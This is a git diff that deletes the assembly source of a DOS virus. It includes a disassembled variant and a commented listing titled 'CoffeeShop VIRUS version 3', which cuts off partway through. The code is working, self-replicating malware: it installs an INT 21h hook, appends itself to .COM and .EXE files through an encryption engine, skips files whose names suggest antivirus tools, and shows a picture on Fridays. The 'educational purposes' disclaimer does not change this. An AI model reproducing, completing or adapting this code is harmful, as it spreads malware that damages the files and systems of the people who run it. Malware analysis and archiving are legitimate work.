0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h - db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh - db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah - db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h - db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh - db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h - db 0E9h, 07Dh, 0EBh - -last: - -_TEXT ends - end first - - diff --git a/c/COFFSHP1 (44).ASM b/c/COFFSHP1 (44).ASM deleted file mode 100755 index b0984d5..0000000 --- a/c/COFFSHP1 (44).ASM +++ /dev/null @@ -1,825 +0,0 @@ - -PAGE 59,132 - -; -; -; COFFSHP1 -; -; Created: 23-Jun-92 -; Passes: 5 Analysis Options on: AW -; -; - -data_1e equ 0F8h -data_2e equ 0FAh -data_3e equ 43Bh -data_4e equ 0F4h -data_5e equ 0F8h -data_6e equ 0FCh -data_15e equ 15A1h - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -coffshp1 proc far - -start: - jmp loc_2 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+di],ah - inc ax - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - int 20h ; DOS program terminate - db 27 dup (0) -loc_2: - call sub_2 - -coffshp1 endp - -; -; SUBROUTINE -; - -sub_2 proc near - pop si - mov di,100h - sub si,20h - push ax - push ds - push es - push di - push si - cld ; Clear direction - mov ah,30h ; '0' - int 21h ; DOS Services ah=function 30h - ; get DOS version number ax - xchg ah,al - cmp ax,30Ah - jb loc_3 ; Jump if below - mov ax,33DAh - int 21h ; ??INT Non-standard interrupt - cmp ah,0A5h - je loc_3 ; Jump if equal - mov ax,es - dec ax - mov ds,ax - xor bx,bx ; Zero register - cmp byte ptr [bx],5Ah ; 'Z' - jne loc_3 ; Jump if not equal - mov ax,[bx+3] - sub ax,72h - jc loc_3 ; Jump if carry Set - mov [bx+3],ax - sub word ptr [bx+12h],72h - mov es,[bx+12h] - push cs - pop ds - mov cx,620h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push es - pop ds - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_1e,bx - mov ds:data_2e,es -;* mov dx,offset loc_1 - db 0BAh, 01h, 02h - mov ax,2521h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - cmp al,5 - jne loc_3 ; Jump if not equal - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - or dh,dh ; Zero ? - jnz loc_3 ; Jump if not zero - pop ax - push ax - call sub_3 -loc_3: - pop si - pop di - pop es - pop ds - pop ax - cmp byte ptr cs:[si+1Ch],0 - je loc_4 ; Jump if equal - mov bx,ds - add bx,10h - mov cx,bx - add bx,cs:[si+0Eh] - cli ; Disable interrupts - mov ss,bx - mov sp,cs:[si+10h] - sti ; Enable interrupts - add cx,cs:[si+16h] - push cx - push word ptr cs:[si+14h] - retf ; Return far -loc_4: - push di - mov cx,1Ch - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - mov bx,ax - add bx,152h - push cs - push bx - add ax,62Fh - and ax,0FFF0h - mov di,ax - mov si,data_3e - mov cx,2E5h - push cs - pop es - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov cl,4 - shr ax,cl ; Shift w/zeros fill - mov dx,cs - add ax,dx - sub ax,10h - mov ds,ax - mov es,ax - push ax - mov ax,100h - push ax - retf ; Return far -sub_3 endp - - and [bp+di+6Fh],al - db 'ffeeShop ' - db 0B0h, 03h,0CFh, 9Ch, 3Dh,0DAh - db 33h, 75h, 05h,0B8h, 01h,0A5h - db 9Dh,0CFh - db 06h, 1Eh, 56h, 57h, 52h, 51h - db 53h, 50h, 3Dh, 00h, 4Bh, 74h - db 0Ch, 3Dh, 00h - db 6Ch, 75h, 0Ah - db 0F6h,0C3h, 03h, 75h, 05h, 8Bh - db 0D7h -loc_7: - call sub_4 -loc_8: - pop ax - pop bx - pop cx - pop dx - pop di - pop si - pop ds - pop es - popf ; Pop flags - jmp dword ptr cs:data_5e - -; -; SUBROUTINE -; - -sub_4 proc near - cld ; Clear direction - push cs - pop es - mov si,dx - xor di,di ; Zero register - mov cx,80h - -locloop_9: - lodsb ; String [si] to al - cmp al,0 - je loc_12 ; Jump if equal - cmp al,61h ; 'a' - jb loc_10 ; Jump if below - cmp al,7Ah ; 'z' - ja loc_10 ; Jump if above - xor al,20h ; ' ' -loc_10: - stosb ; Store al to es:[di] - loop locloop_9 ; Loop if cx > 0 - - -loc_ret_11: - retn -loc_12: - stosb ; Store al to es:[di] - lea si,[di-5] ; Load effective addr - push cs - pop ds - lodsw ; String [si] to ax - cmp ax,452Eh - jne loc_13 ; Jump if not equal - lodsw ; String [si] to ax - cmp ax,4558h - jmp short loc_14 -loc_13: - cmp ax,432Eh - jne loc_ret_11 ; Jump if not equal - lodsw ; String [si] to ax - cmp ax,4D4Fh -loc_14: - jne loc_ret_11 ; Jump if not equal - std ; Set direction flag - mov cx,si - inc cx - -locloop_15: - lodsb ; String [si] to al - cmp al,3Ah ; ':' - je loc_16 ; Jump if equal - cmp al,5Ch ; '\' - je loc_16 ; Jump if equal - loop locloop_15 ; Loop if cx > 0 - - dec si -loc_16: - cld ; Clear direction - lodsw ; String [si] to ax - lodsw ; String [si] to ax - mov di,3BEh - mov cl,0Ch - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jz loc_ret_11 ; Jump if zero - mov ax,3300h - int 21h ; DOS Services ah=function 33h - ; get ctrl-break flag in dl - push dx - cwd ; Word to double word - inc ax - push ax - int 21h ; DOS Services ah=function 33h - ; set ctrl-break flag dl=off/on - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - push es - push bx - push cs - pop ds - mov dx,offset int_24h_entry - mov ah,25h ; '%' - push ax - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4300h - cwd ; Word to double word - int 21h ; DOS Services ah=function 43h - ; get attrb cx, filename @ds:dx - push cx - xor cx,cx ; Zero register - mov ax,4301h - push ax - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_17 ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_18 ; Jump if carry=0 -loc_17: - jmp loc_24 -loc_18: - xchg ax,bx - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get file date+time, bx=handle - ; returns cx=time, dx=time - push dx - push cx - mov cx,1Ch - mov si,100h - mov dx,si - call sub_7 - jc loc_19 ; Jump if carry Set - mov ax,4202h - xor cx,cx ; Zero register - cwd ; Word to double word - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,data_4e - mov [di],ax - mov [di+2],dx - cmp word ptr [si+12h],4021h - je loc_19 ; Jump if equal - cmp word ptr [si],5A4Dh - je loc_20 ; Jump if equal - mov byte ptr [si+1Ch],0 - test byte ptr [si],80h - jz loc_19 ; Jump if zero - cmp word ptr [di],0D000h - jae loc_19 ; Jump if above or = - cmp word ptr [di],7D0h - jb loc_19 ; Jump if below - call sub_10 - jnz loc_19 ; Jump if not zero - mov byte ptr [si],0E9h - mov ax,[di] - add ax,1Ah - mov [si+1],ax - jmp short loc_22 -loc_19: - jmp loc_23 -loc_20: - mov byte ptr [si+1Ch],1 - cmp word ptr [si+18h],40h - jb loc_21 ; Jump if below - mov ax,3Ch - cwd ; Word to double word - call sub_6 - jc loc_23 ; Jump if carry Set - mov ax,[si-4] - mov dx,[si-2] - call sub_6 - jc loc_23 ; Jump if carry Set - cmp byte ptr [si-3],45h ; 'E' - je loc_23 ; Jump if equal -loc_21: - call sub_9 - cmp [si+4],ax - jne loc_23 ; Jump if not equal - cmp [si+2],dx - jne loc_23 ; Jump if not equal - cmp word ptr [si+0Ch],0 - je loc_23 ; Jump if equal - cmp word ptr [si+1Ah],0 - jne loc_23 ; Jump if not equal - call sub_10 - jnz loc_23 ; Jump if not zero - call sub_8 - mov [si+4],ax - mov [si+2],dx - call sub_11 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,[si+8] - dec ax - add dx,2Dh - mov [si+16h],ax - mov [si+0Eh],ax - mov [si+14h],dx - mov word ptr [si+10h],17E0h - lea di,[si+0Ah] ; Load effective addr - call sub_5 - lea di,[si+0Ch] ; Load effective addr - call sub_5 -loc_22: - call sub_12 - mov word ptr [si+12h],4021h - mov cx,1Ch - mov dx,si - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_23: - pop cx - pop dx - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_24: - pop ax - pop cx - cwd ; Word to double word - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - pop ax - pop dx - pop ds - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ax - pop dx - int 21h ; DOS Services ah=function 33h - ; set ctrl-break flag dl=off/on - retn -sub_4 endp - - inc bx - dec di - push bx - inc bx - inc bx - dec sp - push si - push bx - dec si - inc bp - dec ax - push sp - push sp - inc dx - push si - dec cx - push dx - inc cx - inc si - inc bp - dec bp - push sp - inc dx - push dx - -; -; SUBROUTINE -; - -sub_5 proc near - mov ax,[di] - sub ax,62h - jc loc_25 ; Jump if carry Set - cmp ax,14Bh - jae loc_26 ; Jump if above or = -loc_25: - mov ax,14Bh -loc_26: - mov [di],ax - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - call sub_13 - mov dx,data_6e - mov cx,4 - -; External Entry into Subroutine - -sub_7: - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - call sub_11 - add ax,620h - adc dx,0 - jmp short loc_27 - -; External Entry into Subroutine - -sub_9: - call sub_11 -loc_27: - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - or dx,dx ; Zero ? - jz loc_ret_28 ; Jump if zero - inc ax - -loc_ret_28: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - call sub_11 - call sub_13 - mov cx,620h - mov dx,si - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - cmp ax,cx - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - mov ax,[di] - mov dx,[di+2] - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - xor ax,ax ; Zero register - cwd ; Word to double word - -; External Entry into Subroutine - -sub_13: - xchg cx,dx - xchg ax,dx - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - retn -sub_12 endp - - and [di+4Bh],cl - and [bx],ah - cmp [bp+si],si - and ds:data_15e[bx],bh - cmp di,sp - jb loc_29 ; Jump if below - mov ah,4Ch ; 'L' - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_29: - mov si,403h - mov cx,170h - std ; Set direction flag - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - cld ; Clear direction - mov si,di - mov di,100h - lodsw ; String [si] to ax - lodsw ; String [si] to ax - mov bp,ax - mov dl,10h - jmp $+1439h - adc ax,7FDFh - cld ; Clear direction - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov ah,0 - push ax - sti ; Enable interrupts - mov bh,0B0h - cmp al,7 -;* je loc_31 ; Jump if equal - db 74h,0FFh - dec word ptr [bp+si] - cmp al,4 - jae $+2Ah ; Jump if above or = - mov bh,0B8h - cmp al,2 - jb $+24h ; Jump if below - mov es,bx - mov si,140h - db 0FFh,0FFh,0B0h, 19h, 57h,0B1h - db 50h,0F3h,0A5h, 5Fh, 81h,0C7h - db 0A0h, 00h,0FEh,0C8h, 75h,0F2h - db 03h, 8Fh,0B8h, 07h, 0Eh,0D6h - db 0FBh, 0Ch,0CDh, 21h, 58h,0F8h - db 63h,0A7h,0CBh, 20h, 02h,0FEh - db 20h, 00h,0FAh,0EBh,0B0h,0FCh - db 0F8h, 03h, 77h,0F0h,0E0h,0D0h - db 41h, 0Fh,0C0h, 2Fh, 07h, 1Dh - db 80h, 6Fh,0BAh,0DCh,0E1h, 34h - db 0DBh, 0Ch,0F8h,0F0h, 0Eh,0DFh - db 0FEh,0F4h,0F8h,0BBh,0AEh,0F8h - db 0E4h, 03h, 84h,0E0h,0FCh,0EBh - db 0B0h,0E6h,0EAh,0A3h, 83h,0DAh - db 0AAh, 0Eh,0DCh, 09h,0BAh,0C8h - db 01h, 3Ah,0F0h, 50h, 07h,0A2h - db 0E8h,0E0h,0ACh, 05h,0DBh, 0Eh - db 77h, 0Fh,0F8h,0DCh,0F6h,0BAh - db 0AEh,0F0h,0F6h,0EBh, 3Ah,0F0h - db 0F4h,0E0h, 40h, 17h,0FAh -loc_33: - in al,dx ; port 10h ??I/O Non-standard - sbb ax,0DF72h - esc 2,dl ; coprocessor escape - jz loc_33 ; Jump if zero - mov dx,20DDh - sbb ax,0DE74h - and [bp+si-45F9h],ch - esc 0,[bx+di-8] ; coprocessor escape - inc di - xchg di,ax - call $-171Ch - clc ; Clear carry flag - xchg ax,dx - hlt ; Halt processor - add [di],bl - db 60h,0D8h,0E8h, 09h,0DCh,0FEh - db 09h,0F8h,0B0h, 23h,0F8h, 5Ch - db 0D7h,0FCh,0F8h,0FCh,0E8h, 01h - db 3Bh,0F4h,0ECh, 80h,0D2h, 1Dh - db 0BEh,0BAh, 5Ch, 20h, 7Ch, 03h - db 75h, 60h,0CAh, 20h, 0Eh,0B2h - db 0D8h, 81h,0F0h, 3Bh, 40h, 92h - db 0D7h,0B5h,0CEh,0F8h,0DCh, 60h - db 0A7h, 41h,0DEh, 60h, 02h,0B5h - db 0BEh, 3Ch, 20h, 0Fh, 7Bh, 22h - db 65h, 07h, 15h, 60h, 6Eh, 42h - db 68h,0B8h, 20h,0FEh,0FCh,0AEh - db 23h,0FCh,0E2h, 7Fh, 07h,0C0h - db 0B3h, 20h, 2Fh, 60h, 79h, 28h - db 6Ah,0DEh, 7Eh,0E0h, 08h,0D5h - db 09h,0E4h,0C0h, 60h,0C1h, 70h - db 0Bh,0DFh,0E4h, 42h,0D0h, 7Bh - db 4Fh, 5Eh, 9Ah, 05h,0ADh - db 22h - db 06h, 80h, 70h, 10h, 60h, 3Eh - db 05h,0CAh, 5Eh, 41h, 46h,0A4h - db 53h,0EFh, 15h - db 7Ah - db 97h,0C2h, 54h, 74h, 04h, 20h - db 60h, 50h, 45h, 01h,0C8h,0E8h - db 0DCh, 05h,0F9h, 06h, 54h,0D8h - db 0DEh, 41h, 2Dh, 78h, 7Ah, 01h - db 55h, 75h, 04h, 20h, 76h, 1Dh - db 0B8h, 2Eh,0EAh,0A0h,0C6h, 62h - db 55h, 83h, 8Ah, 5Eh, 09h,0C0h - db 0Ah, 5Ch, 20h,0C6h, 11h, 12h - db 0D0h, 2Ah, 74h, 58h, 5Dh, 5Eh - db 17h, 5Bh, 60h, 80h, 92h, 0Eh - db 40h,0EAh, 40h, 75h,0ACh, 62h - db 15h, 74h,0C4h, 59h, 5Eh,0C0h - db 9Dh,0C4h, 82h, 15h, 08h,0DCh - db 20h, 14h, 90h, 60h, 20h, 43h - db 66h, 62h, 94h, 50h, 3Bh, 65h - db 0ECh, 5Eh,0A4h, 1Dh,0CFh, 70h - db 80h,0C2h, 20h, 8Ah, 0Eh,0B2h - db 62h, 2Ah,0ECh, 69h,0CCh, 5Eh - db 80h, 55h,0BEh, 0Bh,0C0h, 80h - db 62h, 41h, 0Eh, 04h, 72h,0FEh - db 56h, 05h, 6Eh, 10h, 01h,0D5h - db 41h,0AEh,0FEh,0CEh, 9Eh,0D1h - db 08h,0FEh,0C4h,0E9h, 5Ch,0E6h - db 0AAh, 62h,0CCh,0C0h,0C8h, 01h - db 62h, 39h,0ECh, 6Ch,0F2h, 9Dh - db 62h,0BCh, 94h, 48h, 41h, 28h - db 4Ah, 45h, 38h, 26h,0FEh, 52h - db 1Ch, 5Ah, 5Fh,0FEh,0BEh, 40h - db 02h, 84h,0F2h, 0Ah,0B8h,0AEh - db 70h,0FEh,0FCh, 8Eh, 12h, 6Ah - db 0DEh, 54h,0D8h, 61h,0ACh, 50h - db 0B1h, 43h, 3Eh, 72h, 80h,0A3h - db 60h, 48h, 6Ah, 82h, 0Eh, 96h - db 02h, 66h, 3Ah, 6Ch, 58h, 84h - db 0B4h,0D1h, 01h, 5Ah, 48h, 3Ah - db 0EAh, 44h, 70h, 0Bh,0E8h,0D8h - db 24h, 9Eh, 28h, 12h, 73h,0C6h - db 54h,0D0h,0FFh - db 0F0h,0FFh, 60h, 34h, 50h, 00h - db 00h,0FFh - -; -; SUBROUTINE -; - -sub_14 proc near - shr bp,1 ; Shift w/zeros fill - dec dl - jnz loc_ret_38 ; Jump if not zero - lodsw ; String [si] to ax - mov bp,ax - mov dl,10h - -loc_ret_38: - retn -sub_14 endp - -loc_39: - call sub_14 - rcl bh,1 ; Rotate thru carry - call sub_14 - jc loc_42 ; Jump if carry Set - mov dh,2 - mov cl,3 - -locloop_40: - call sub_14 - jc loc_41 ; Jump if carry Set - call sub_14 - rcl bh,1 ; Rotate thru carry - shl dh,1 ; Shift w/zeros fill - loop locloop_40 ; Loop if cx > 0 - -loc_41: - sub bh,dh -loc_42: - mov dh,2 - mov cl,4 - -locloop_43: - inc dh - call sub_14 - jc loc_44 ; Jump if carry Set - loop locloop_43 ; Loop if cx > 0 - - call sub_14 - jnc loc_45 ; Jump if carry=0 - inc dh - call sub_14 - jnc loc_44 ; Jump if carry=0 - inc dh -loc_44: - mov cl,dh - jmp short locloop_51 -loc_45: - call sub_14 - jc loc_47 ; Jump if carry Set - mov cl,3 - mov dh,0 - -locloop_46: - call sub_14 - rcl dh,1 ; Rotate thru carry - loop locloop_46 ; Loop if cx > 0 - - add dh,9 - jmp short loc_44 -loc_47: - lodsb ; String [si] to al - mov cl,al - add cx,11h - jmp short locloop_51 -loc_48: - mov cl,3 - -locloop_49: - call sub_14 - rcl bh,1 ; Rotate thru carry - loop locloop_49 ; Loop if cx > 0 - - dec bh -loc_50: - mov cl,2 - -locloop_51: - mov al,es:[bx+di] - stosb ; Store al to es:[di] - loop locloop_51 ; Loop if cx > 0 - -loc_52: - call sub_14 - jnc loc_53 ; Jump if carry=0 - movsb ; Mov [si] to es:[di] - jmp short loc_52 -loc_53: - call sub_14 - lodsb ; String [si] to al - mov bh,0FFh - mov bl,al - jc loc_39 ; Jump if carry Set - call sub_14 - jc loc_48 ; Jump if carry Set - cmp bh,bl - jne loc_50 ; Jump if not equal - xor bp,bp ; Zero register - xor di,di ; Zero register - xor si,si ; Zero register - xor dx,dx ; Zero register - xor bx,bx ; Zero register - xor ax,ax ; Zero register - jmp $-1480h - -seg_a ends - - - - end start diff --git a/c/COFFSHP3 (45).ASM b/c/COFFSHP3 (45).ASM deleted file mode 100755 index bf2786e..0000000 --- a/c/COFFSHP3 (45).ASM +++ /dev/null @@ -1,1674 +0,0 @@ -;****************************************************************************** -;* CoffeeShop VIRUS version 3 -;* -;* Use MASM 4.0 to compile this source -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;****************************************************************************** - - - .RADIX 16 - - -_TEXT segment - - assume cs:_TEXT, ds:_TEXT - - -VERSION equ 3 -PICLEN equ last - beeld ;length of picture routine -FILELEN equ last - first ;length of virus -FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs -VIRPAR equ 00D0 ;space for resident virus -WORKPAR equ 0160 ;work space for engine -STACKOFF equ 1000 ;Stack offset -DATAPAR equ 0050 ;extra memory allocated -BUFLEN equ 1C ;length of buffer - - -;**************************************************************************** -;* data area for virus -;**************************************************************************** - - org 00E0 - -mutstack dw 0, 0 -oldlen dw 0, 0 -oi21 dw 0, 0 -minibuf db 0, 0, 0, 0 - - -;**************************************************************************** -;* data area for engine -;**************************************************************************** - -add_val dw 0 -xor_val dw 0 -xor_offset dw 0 -where_len dw 0 -where_len2 dw 0 -flags db 0 - - -;****************************************************************************** -;* Begin of virus, installation in memory -;****************************************************************************** - - org 0100 - -first: call next ;get IP -next: pop si - - sub si,low 3 ;SI = begin virus - mov di,0100 - cld - - push ax ;save registers - push ds - push es - push di - push si - - mov ah,30 ;DOS version >= 3.1? - int 21 - xchg ah,al - cmp ax,030A - jb not_install - - mov ax,33DA ;already resident? - int 21 - cmp ah,0A5 - je not_install - - mov ax,es ;adjust memory-size - dec ax - mov ds,ax - xor bx,bx - cmp byte ptr [bx],5A - jne not_install - mov ax,[bx+3] - sub ax,(VIRPAR+WORKPAR) - jb not_install - mov [bx+3],ax - sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) - - mov es,[bx+12] ;copy program to top - push cs - pop ds - mov cx,FILELEN - rep movsb - - push es - pop ds - - mov ax,3521 ;get original int21 vector - int 21 - mov ds:[oi21],bx - mov ds:[oi21+2],es - - mov dx,offset ni21 ;install new int21 handler - mov ax,2521 - int 21 - - mov ax,33DBh ;init. random nr. generator - int 21 - - mov ah,2A ;ask date - int 21 - cmp al,5 ;friday ? - jne not_install - mov ah,2C ;ask time - int 21 - or dh,dh ;sec = 0 ? - jnz not_install - - mov ax,33DC ;show picture - int 21 - -not_install: pop si ;restore registers - pop di - pop es - pop ds - pop ax - - add si,(offset buffer) - sub si,di - cmp byte ptr cs:[si],4Dh ;COM or EXE ? - je entryE - -entryC: push di - mov cx,BUFLEN - rep movsb - ret - -entryE: mov bx,ds ;calculate CS - add bx,low 10 - mov cx,bx - add bx,cs:[si+0E] - cli ;restore SS and SP - mov ss,bx - mov sp,cs:[si+10] - sti - add cx,cs:[si+16] - push cx ;push new CS on stack - push cs:[si+14] ;push new IP on stack - db 0CBh ;retf - - -;****************************************************************************** -;* Interupt 24 handler -;****************************************************************************** - -ni24: mov al,3 ;to avoid 'Abort, Retry, ...' - iret - - -;****************************************************************************** -;* Interupt 21 handler -;****************************************************************************** - -ni21: pushf - - cmp ax,33DA ;install-check ? - jne not_ic - mov ax,0A500+VERSION ;return a signature - popf - iret - -not_ic: push es ;save registers - push ds - push si - push di - push dx - push cx - push bx - push ax - - cmp ax,33DBh ;rnd init ? - jne not_ri - call rnd_init - jmp short no_infect - -not_ri: cmp ax,33DC ;show picture? - je show_pic - -not_pi: cmp ax,4B00 ;execute ? - je do_it - - cmp ax,6C00 ;open DOS 4.0+ ? - jne no_infect - test bl,3 - jnz no_infect - mov dx,di - -do_it: call infect - -no_infect: pop ax ;restore registers - pop bx - pop cx - pop dx - pop di - pop si - pop ds - pop es - popf - -org21: jmp dword ptr cs:[oi21] ;call to old int-handler - - -;****************************************************************************** -;* Show picture -;****************************************************************************** - -show_pic: mov ax,offset no_infect ;push return adres on stack - push cs - push ax - - mov di,((VIRPAR*10)+0100) ;move picture routine - mov si,offset beeld - mov cx,PICLEN - push cs - pop ds - push cs - pop es - rep movsb - - mov ax,cs ;calculate segment registers - add ax,low VIRPAR - mov ds,ax - mov es,ax - - push ax ;push picture adres on stack - mov ax,0100 - push ax - - db 0CBh ;(retf) goto picture routine - - -;****************************************************************************** -;* Tries to infect the file -;****************************************************************************** - -infect: cld - - push cs ;copy filename to CS:0000 - pop es - mov si,dx - xor di,di - mov cx,0080 -namemove: lodsb - cmp al,0 - je moved - cmp al,'a' - jb char_ok - cmp al,'z' - ja char_ok - xor al,20 ;convert to upper case -char_ok: stosb - loop namemove -return0: ret - -moved: stosb ;put last zero after filename - lea si,[di-5] - push cs - pop ds - - lodsw ;check extension .COM or .EXE - cmp ax,'E.' - jne not_exe - lodsw - cmp ax,'EX' - jmp short check - -not_exe: cmp ax,'C.' - jne return0 - lodsw - cmp ax,'MO' -check: jne return0 - - std ;find begin of filename - mov cx,si - inc cx -searchbegin: lodsb - cmp al,':' - je checkname - cmp al,'\' - je checkname - loop searchbegin - dec si - -checkname: cld ;check filename - lodsw - lodsw - mov di,offset names - mov cl,13 - repnz scasw - je return0 - - mov ax,3300 ;get ctrl-break flag - int 21 - push dx ;save flag on stack - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524 ;get int24 vector - int 21 - push es ;save vector on stack - push bx - - push cs - pop ds - - mov dx,offset ni24 ;install new int24 handler - mov ah,25 - push ax - int 21 - - mov ax,4300 ;ask file-attributes - cwd - int 21 - push cx ;save attributes on stack - - xor cx,cx ;clear attributes - mov ax,4301 - push ax - int 21 - jc return1v - - mov ax,3D02 ;open the file - int 21 - jnc opened -return1v: jmp return1 - -opened: xchg ax,bx ;save handle - - mov ax,5700 ;get file date & time - int 21 - push dx ;save date & time on stack - push cx - - mov cx,BUFLEN ;read begin of file - mov si,offset buffer - mov dx,si - call read - jc closev - - mov ax,4202 ;goto end, get filelength - xor cx,cx - cwd - int 21 - - mov di,offset oldlen ;save filelength - mov [di],ax - mov [di+2],dx - - mov ax,word ptr [si+12] ;already infected? - add al,ah - cmp al,'@' - jz closev - - cmp word ptr [si],'ZM' ;EXE ? - je do_EXE - -do_COM: test byte ptr [si],80 ;maybe a strange EXE? - jz closev - - mov ax,word ptr [di] ;check lenght of file - cmp ah,0D0 - jae closev - cmp ah,1 - jb closev - - mov dx,ax - add dx,0100 - call writeprog ;call Engine and write virus - jne closev - - mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin - sub ax,low 3 - mov word ptr [si+1],ax - jmp done - -closev: jmp close - -do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? - jb not_win - - mov ax,003C - cwd - call readbytes - jc closev - - mov ax,word ptr [di+8] - mov dx,word ptr [di+0A] - call readbytes - jc closev - - cmp byte ptr [di+9],'E' - je closev - -not_win: call getlen - call calclen ;check for internal overlays - cmp word ptr [si+4],ax - jne close - cmp word ptr [si+2],dx - jne close - - cmp word ptr [si+0C],0 ;high memory allocation? - je close - - cmp word ptr [si+1A],0 ;overlay nr. not zero? - jne close - - call getlen ;calculate new CS & IP - mov cx,0010 - div cx - sub ax,word ptr [si+8] - dec ax - add dx,low 10 - - call writeprog ;call Engine and write virus - jne close - - mov word ptr [si+16],ax ;put CS in header - mov word ptr [si+0E],ax ;put SS in header - mov word ptr [si+14],dx ;put IP in header - mov word ptr [si+10],STACKOFF ;put SP in header - - call getlen - add ax,cx - adc dx,0 - call calclen ;put new length in header - mov word ptr [si+4],ax - mov word ptr [si+2],dx - - lea di,[si+0A] ;adjust mem. allocation info - call mem_adjust - lea di,[si+0C] - call mem_adjust - -done: call gotobegin - call rnd_get ;signature - mov ah,'@' - sub ah,al - mov word ptr [si+12],ax - mov cx,BUFLEN ;write new begin - mov dx,si - mov ah,40 - int 21 - -close: pop cx ;restore date & time - pop dx - mov ax,5701 - int 21 - - mov ah,3E ;close the file - int 21 - -return1: pop ax ;restore attributes - pop cx - cwd - int 21 - - pop ax ;restore int24 vector - pop dx - pop ds - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - ret - - -;****************************************************************************** -;* Filenames to avoid -;****************************************************************************** - -names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' - db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' - db ' ', ' ', ' ' - - -;****************************************************************************** -;* Write virus to the program -;****************************************************************************** - -writeprog: push ax ;save registers - push dx - push si - push bp - push es - - cli - mov word ptr [di-4],ss ;save SS & SP - mov word ptr [di-2],sp - - mov ax,cs ;new stack & buffer-segment - mov ss,ax - mov sp,((VIRPAR + WORKPAR) * 10) - add ax,low VIRPAR - mov es,ax - sti - - push ds - - mov bp,dx ;input parameters for engine - mov dx,0100 - mov cx,FILELEN - xor si,si - mov al,0Fh - - push di - push bx - - call crypt ;call the Engine - - pop bx - pop di - - push cx - push dx - mov ax,4202 ;goto end - xor cx,cx - cwd - int 21 - pop dx - pop cx - - mov ah,40 ;write virus - int 21 - cmp ax,cx ;are all bytes written? - - pop ds - - cli - mov ss,word ptr [di-4] ;restore stack - mov sp,word ptr [di-2] - sti - - pop es ;restore registers - pop bp - pop si - pop dx - pop ax - - ret - - -;****************************************************************************** -;* Adjust mem allocation info in EXE header -;****************************************************************************** - -mem_adjust: mov ax,[di] - sub ax,low FILEPAR ;alloc. may be this much less - jb more - cmp ax,DATAPAR ;minimum amount to allocate - jae mem_ok -more: mov ax,DATAPAR -mem_ok: mov [di],ax - ret - - -;****************************************************************************** -;* Read a few bytes -;****************************************************************************** - -readbytes: call goto - mov dx,offset minibuf - mov cx,4 -read: mov ah,3F - int 21 - ret - - -;****************************************************************************** -;* Calculate length for EXE header -;****************************************************************************** - -calclen: mov cx,0200 - div cx - or dx,dx - jz no_cor - inc ax -no_cor: ret - - -;****************************************************************************** -;* Get original length of program 